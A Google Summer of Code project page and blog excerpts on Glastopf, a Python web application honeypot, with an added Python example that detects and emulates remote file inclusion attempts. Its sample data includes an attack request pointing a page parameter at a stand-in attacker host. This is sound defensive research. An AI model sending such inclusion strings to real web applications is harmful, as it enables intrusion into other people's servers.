GSoC Project #8 - Web Application Honeypot

Many of today's most advanced attacks now happen at the web application layer. This solution is designed to capture information on the latest web application attacks using scalable and easy-to-deploy low-interaction server honeypots.

Primary Mentor: Thorsten Holz
Student: Lukas Rist
Glastopf is a minimalistic web server emulator written in Python. The honeypot collects information about web application attacks such as remote file inclusion, SQL injection and local file inclusion. Glastopf scans each incoming request for strings like "=http://" or "=ftp://". On a match, it tries to download and analyze the referenced file and to respond as closely as possible to what the attacker expects. If those expectations are met, the attacker typically follows up by sending a bot, a shell or a spreader; such files can then be analyzed, for example for IRC information, to infiltrate the botnet behind this kind of attack. The collected data is stored in a MySQL database that can be browsed via a web interface.

Deliverables:

  • Improvement of the included files parser.
  • A central MySQL database to consolidate the collected data.
  • A central vulnerability database, so that the Google dork list can be extended automatically with previously unknown attack strings.
  • A template system for common web applications to provide a larger attack surface for the honeypot.
  • External interfaces to Glastopf such that other projects can also integrate the collected information.
  • Informing owners of compromised web pages with the information collected in the central database.
  • Project documentation in the TRAC wiki.
  • Analysis of the collected files.
  • Statistical analysis of the collected attack information.
  • Code cleanup. There are many lines to revise.

Timeline:
From 23.05.2009:

  • Coding start

Due 20.06.2009:

  • Central Database
  • Vulnerability Database

Due 20.07.2009:

  • Improved file parser and analysis
  • Template system
  • Statistical analysis

Due 05.08.2009:

  • Documentation
  • Code cleanup

10.08.2009:

  • Pencils down

GlastopfNG release

Before we get worse than Duke Nukem Forever, we decided to finally release the next generation of the web application honeypot Glastopf, aka GlastopfNG!

Glastopf's new vulnerability emulator

The number of attacks against the web honeypot depends strongly on its PHP parser, so keeping the pattern matching mechanism up to date was one of the major open tasks. One of my goals for the Google Summer of Code period is to improve the parser and to reduce the impact of upcoming changes in attack patterns. The old parser was very simple: collect all lines containing echo calls, look for known patterns and generate the appropriate response.
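The two mechanisms described above (the "=http://" / "=ftp://" request scan from the project overview and the echo-based response generation of the old parser), as an added illustration that is not Glastopf's own code. The request-line parsing, the `fetch` callback and the echo regex are assumptions of this example; the download step is replaced by an injected callable so it runs offline.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# A parameter value that starts with a URL scheme is the signal the honeypot
# looks for (the "=http://" / "=ftp://" strings in the raw request).
REMOTE_URL = re.compile(r'^(?:https?|ftp)://\S+', re.IGNORECASE)

# Hypothetical echo extractor for the fetched file: only literal "..." / '...'
# arguments to echo are handled, mirroring the "collect echo calls" approach.
ECHO_LITERAL = re.compile(r'\becho\s+(["\'])(.*?)\1\s*;', re.IGNORECASE | re.DOTALL)


def find_remote_includes(request_line):
    """Return (parameter, url) pairs from a request line such as
    'GET /index.php?page=http://... HTTP/1.1' whose value is a remote URL."""
    parts = request_line.split()
    target = parts[1] if len(parts) >= 2 else request_line
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if REMOTE_URL.match(value):
            hits.append((name, value))
    return hits


def emulate_echo_output(php_source):
    """Concatenate what the included file would print via its literal echo calls."""
    return ''.join(m.group(2) for m in ECHO_LITERAL.finditer(php_source))


def handle_request(request_line, fetch, log):
    """Honeypot decision: record every inclusion attempt, retrieve the referenced
    file through `fetch` and answer with the emulated output; None means no RFI."""
    hits = find_remote_includes(request_line)
    for name, url in hits:
        log.append({'param': name, 'url': url})
    if not hits:
        return None
    return ''.join(emulate_echo_output(fetch(url)) for _, url in hits)


# Constructed sample data (not captured traffic): one request line and the
# content the injected fetcher returns for the referenced URL.
SAMPLE_REQUEST = 'GET /index.php?page=http://attacker.example/probe.txt?&lang=en HTTP/1.1'
SAMPLE_FILES = {'http://attacker.example/probe.txt?': '<?php echo "abc"; echo \'123\'; ?>'}

if __name__ == '__main__':
    events = []
    body = handle_request(SAMPLE_REQUEST, lambda u: SAMPLE_FILES.get(u, ''), events)
    print(events, repr(body))
```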

Improving Glastopf

Last Saturday I finally released a new Glastopf version. There are some new features and many changes under the hood.

Introducing Glastopf, a Web Application Honeypot

Hello, this initial blog post introduces me and gives a brief overview of my GSoC project.

My name is Lukas Rist (my personal blog) and I am currently studying Math and Physics at the University of Kaiserslautern in Germany. This is my first time in GSoC and I will be working with Thorsten Holz on Glastopf, a Web Application Honeypot.
